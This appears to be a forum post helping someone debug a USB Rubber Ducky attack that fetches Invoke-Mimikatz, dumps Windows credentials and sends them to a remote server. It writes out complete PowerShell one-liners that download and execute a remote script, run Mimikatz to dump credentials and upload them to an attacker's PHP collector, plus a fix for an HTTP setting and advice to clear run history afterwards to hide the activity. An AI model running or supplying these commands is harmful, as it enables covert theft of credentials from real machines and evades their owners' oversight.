shr00mie

This what you're looking for. https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz

1 - your rubber ducky script is out of order. you're deleting run history and then running the script. somewhat counterproductive as your last command would still remain. delete run history after running script. 2 - open PS as admin and run the below code in the window. see what the output says. an empty file indicates that the the content of the variable is being sent from PS to the web server, but there's no content. this would lead me to believe that there's an issue either downloading or running mimikatz. IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

i was having the same problem. definitely spent quite a bit of time on the interwebs trying to figure this particular bitch out. turns out it has something to do with HTML1.0 vs 1.1 and how it relates to the "Expect and 100 (Continue)" component: http://www8.org/w8-papers/5c-protocols/key/key.html while someone provided the solution, the trick is that it has to be the first command in the line. current working theory is that after PS loads net.webclient, you are no longer able to alter the configuration it's already running as for the remainder of the session. if you, on the other hand, change the setting before any net.webclient components are loaded in the session, subsequent net.webclient instances launched for the remainder of the session will pull from this configuration. below is how i finally got the code to work without throwing any errors on the PS side. [System.Net.ServicePointManager]::Expect100Continue = $false ; IEX (New-Object Net.WebClient).DownloadString('http://ADDRESS/im.ps1') ; $output = Invoke-Mimikatz -DumpCreds ; (New-Object Net.WebClient).UploadString('http://ADDRESS/rx.php' , $output ) then i banged my head against the table for a good 24 hours trying to figure out why the server/rx.php script wasn't creating the .creds file. a good night's sleep and a clear head did the trick.